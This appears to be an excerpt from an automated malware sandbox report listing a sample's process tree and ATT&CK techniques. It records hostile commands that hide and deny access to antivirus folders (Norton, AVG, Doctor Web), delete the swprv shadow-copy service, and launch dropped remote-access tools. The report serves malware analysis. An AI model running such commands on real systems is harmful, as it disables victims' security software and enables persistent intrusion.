C:\Windows\SysWOW64\icacls.exeicacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Norton"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Avg"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\grizzly"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Doctor Web"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Indus"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\WINDOWS\McMwt"Drops file in Windows directoryViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\timeout.exetimeout 1Delays execution with timeout.exe
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Intel"Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Check"Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Temp"Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv
-
C:\Windows\SysWOW64\sc.exesc delete swprv
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exeExecutes dropped EXESuspicious use of AdjustPrivilegeTokenSuspicious use of SetWindowsHookExSuspicious use of WriteProcessMemory
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /trayExecutes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exeExecutes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /trayExecutes dropped EXESuspicious behavior: SetClipboardViewer
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exeChecks SCSI registry key(s)Modifies data under HKEY_USERS
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermServiceLoads dropped DLL
Network
MITRE ATT&CK Matrix
Collection: Data from Local System (5)
Command and Control: Web Service (1)
Credential Access: Credentials in Files (5)
Defense Evasion: Disabling Security Tools (3), Modify Registry (9), Hidden Files and Directories (3), File Permissions Modification (1)
Discovery: Query Registry (3), System Information Discovery (5), Peripheral Device Discovery (1)
Execution: Command-Line Interface (1)